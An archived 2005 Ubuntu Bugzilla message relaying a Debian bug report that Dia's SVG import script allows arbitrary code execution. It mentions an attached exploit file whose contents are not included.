[Bug 16687] dia: Arbitrary code execution when importing a .svg file

bugzilla-daemon at bugzilla.ubuntu.com
Fri Sep 30 11:01:46 UTC 2005


Please do not reply to this email.  You can add comments at
http://bugzilla.ubuntu.com/show_bug.cgi?id=16687
Ubuntu | dia

------- Additional Comments From debzilla at ubuntu.com  2005-09-30 12:01 UTC -------
Message-Id: <1128076797.29351.3.camel at localhost.localdomain>
Date: Fri, 30 Sep 2005 12:39:56 +0200
From: Joxean Koret <joxeankoret at yahoo.es>
To: submit at bugs.debian.org
Subject: dia: Arbitrary code execution when importing a .svg file

Subject: dia: Arbitrary code execution when importing a .svg file
Package: dia
Severity: grave
Justification: user security hole

The script diasvg_import.py that comes with the current Debian stable
version of Dia is vulnerable to arbitrary code execution.

I tried to contact the Dia team too many times but without any luck,
so I think there is no patch at the moment for the issues.

Attached is a working exploit to test the vulnerability.

Regards,
Joxean Koret


-- System Information:
Debian Release: 3.1
Architecture: i386 (i686)
Kernel: Linux 2.6.11-1-386
Locale: LANG=es_ES@euro, LC_CTYPE=es_ES@euro (charmap=ISO-8859-15)


[Attachment: exploit.svg (image/svg+xml)]
